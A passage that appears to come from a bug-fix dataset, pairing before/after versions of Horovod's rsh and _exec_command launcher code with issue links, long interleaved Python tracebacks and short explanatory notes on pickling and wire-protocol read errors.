File "horovod/run/common/util/tiny_shell_exec.py", line 32, in execute
exit_code = safe_shell_exec.execute(command, env=env, stdout=output, stderr=output)
File "horovod/run/common/util/safe_shell_exec.py", line 183, in execute
middleman.start()
File "multiprocessing/process.py", line 105, in start
self._popen = self._Popen(self)
File "multiprocessing/context.py", line 284, in _Popen
return Popen(process_obj)
File "multiprocessing/popen_spawn_posix.py", line 32, in __init__
super().__init__(process_obj)
File "multiprocessing/popen_fork.py", line 19, in __init__
self._launch(process_obj)
File "multiprocessing/popen_spawn_posix.py", line 47, in _launch
reduction.dump(process_obj, fp)
File "multiprocessing/reduction.py", line 60, in dump
ForkingPickler(file, protocol).dump(obj)
AttributeError: Can't pickle local object '_createenviron.<locals>.encode'
|
AttributeError
|
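Note on the mpi_run pair above (issue 2037): the added isinstance check turns a confusing crash into an early, explicit error. The traceback's AttributeError ("Can't pickle local object '_createenviron.<locals>.encode'") arises because os.environ is an os._Environ object whose encode/decode hooks are local functions, and multiprocessing's spawn start method must pickle everything handed to the child process. A plain dict snapshot is picklable; the sketch below reproduces the failure mode:

import os
import pickle

pickle.dumps(dict(os.environ))  # a plain-dict snapshot pickles fine
try:
    pickle.dumps(os.environ)    # os._Environ carries local functions
except (AttributeError, TypeError) as exc:
    print(type(exc).__name__, exc)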
def rsh(
driver_addresses,
key,
host_hash,
command,
env,
local_rank,
verbose,
background=True,
events=None,
):
"""
Method to run a command remotely given a host hash, local rank and driver addresses.
This method connects to the SparkDriverService running on the Spark driver,
retrieves all information required to connect to the task with given local rank
of that host hash and invoke the command there.
The method returns immediately after launching the command if background is True (default).
When background is set to False, this method waits for command termination and returns
command's result. If there is an exception while waiting for the result (e.g. connection reset)
it returns -1.
:param driver_addresses: driver's addresses
:param key: used for encryption of parameters passed across the hosts
:param host_hash: host hash to connect to
:param command: command and arguments to invoke
:param env: environment to use
:param local_rank: local rank on the host of task to run the command in
:param verbose: verbosity level
:param background: run command in background if True, returns command result otherwise
:param events: events to abort the command, only if background is True
"""
if ":" in host_hash:
raise Exception("Illegal host hash provided. Are you using Open MPI 4.0.0+?")
driver_client = driver_service.SparkDriverClient(
driver_addresses, key, verbose=verbose
)
task_indices = driver_client.task_host_hash_indices(host_hash)
task_index = task_indices[local_rank]
task_addresses = driver_client.all_task_addresses(task_index)
task_client = task_service.SparkTaskClient(
task_index, task_addresses, key, verbose=verbose
)
task_client.run_command(command, env)
if not background:
stop = None
events = events or []
for event in events:
stop = threading.Event()
on_event(event, task_client.abort_command, stop=stop)
try:
return task_client.wait_for_command_exit_code()
except:
traceback.print_exc()
return -1
finally:
if stop is not None:
stop.set()
|
def rsh(
driver_addresses,
key,
settings,
host_hash,
command,
env,
local_rank,
background=True,
events=None,
):
"""
Method to run a command remotely given a host hash, local rank and driver addresses.
This method connects to the SparkDriverService running on the Spark driver,
retrieves all information required to connect to the task with given local rank
of that host hash and invoke the command there.
The method returns immediately after launching the command if background is True (default).
When background is set to False, this method waits for command termination and returns
command's result. If there is an exception while waiting for the result (e.g. connection reset)
it returns -1.
:param driver_addresses: driver's addresses
:param key: used for encryption of parameters passed across the hosts
:param settings: settings
:param host_hash: host hash to connect to
:param command: command and arguments to invoke
:param env: environment to use
:param local_rank: local rank on the host of task to run the command in
:param background: run command in background if True, returns command result otherwise
:param events: events to abort the command, only if background is True
"""
if ":" in host_hash:
raise Exception("Illegal host hash provided. Are you using Open MPI 4.0.0+?")
driver_client = driver_service.SparkDriverClient(
driver_addresses, key, verbose=settings.verbose
)
task_indices = driver_client.task_host_hash_indices(host_hash)
task_index = task_indices[local_rank]
task_addresses = driver_client.all_task_addresses(task_index)
task_client = task_service.SparkTaskClient(
task_index, task_addresses, key, verbose=settings.verbose
)
task_client.run_command(command, env)
if not background:
stop = None
events = events or []
for event in events:
stop = threading.Event()
on_event(event, task_client.abort_command, stop=stop)
try:
return task_client.wait_for_command_exit_code()
except:
traceback.print_exc()
return -1
finally:
if stop is not None:
stop.set()
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
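Note on the rsh pair above (issue 1969): the signature change drops the whole settings object in favor of the two fields the function actually uses, key and verbose, so callers no longer need to ship settings across hosts. The struct.error flood in the log is the driver's wire protocol reading a 4-byte length header from connections that closed early. A defensive version of that read (an illustrative sketch, not Horovod's code) would treat a short header as a closed peer instead of letting struct.unpack fail:

import struct

def read_message_len(rfile):
    header = b""
    while len(header) < 4:
        chunk = rfile.read(4 - len(header))
        if not chunk:  # peer closed before sending a full length header
            return None
        header += chunk
    return struct.unpack("i", header)[0]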
def _exec_command_fn(driver_addresses, key, settings, env):
def _exec_command(command, slot_info, events):
host = slot_info.hostname
local_rank = slot_info.local_rank
verbose = settings.verbose
result = rsh(
driver_addresses,
key,
host,
command,
env,
local_rank,
verbose,
False,
events,
)
return result, time.time()
return _exec_command
|
def _exec_command_fn(driver_addresses, key, settings, env):
def _exec_command(command, slot_info, events):
host = slot_info.hostname
local_rank = slot_info.local_rank
result = rsh(
driver_addresses,
key,
settings,
host,
command,
env,
local_rank,
False,
events,
)
return result, time.time()
return _exec_command
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
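The NoValidAddressesFound error above recommends checking every host for a routable interface whose name is common to all hosts. A small sketch for listing candidate interface names on one machine, to be run on each host and intersected by hand; it assumes the third-party psutil package is installed and is not Horovod code:

import socket
import psutil

def ipv4_interfaces():
    # Interface names that carry an IPv4 address (roughly "ifconfig -a").
    return sorted(
        name
        for name, addrs in psutil.net_if_addrs().items()
        if any(addr.family == socket.AF_INET for addr in addrs)
    )

print(ipv4_interfaces())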
|
struct.error
|
def _exec_command(command, slot_info, events):
    host = slot_info.hostname
    local_rank = slot_info.local_rank
    verbose = settings.verbose
    result = rsh(
        driver_addresses, key, host, command, env, local_rank, verbose, False, events
    )
    return result, time.time()
|
def _exec_command(command, slot_info, events):
    host = slot_info.hostname
    local_rank = slot_info.local_rank
    result = rsh(
        driver_addresses, key, settings, host, command, env, local_rank, False, events
    )
    return result, time.time()
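In the merged version above, rsh receives the detached key and the individual verbosity flag instead of the whole settings object, so the secret no longer travels inside the serialized settings. The struct.error flooding the tracebacks comes from the driver's length-prefixed wire protocol: when a peer drops the connection before sending the 4-byte length header, rfile.read(4) returns fewer bytes than struct.unpack('i', ...) expects. A minimal sketch of a more defensive reader, assuming the same wire format; read_message is a hypothetical helper, not Horovod's actual code:

import struct

def read_message(rfile):
    # Read one length-prefixed message: a 4-byte native-endian int length
    # followed by the payload, matching the format in the traceback above.
    header = rfile.read(4)
    if len(header) < 4:
        # The peer closed the stream mid-header; raise a clean EOF instead
        # of the opaque "unpack requires a buffer of 4 bytes" struct.error.
        raise EOFError("connection closed before the message length arrived")
    (message_len,) = struct.unpack("i", header)
    return rfile.read(message_len)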
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
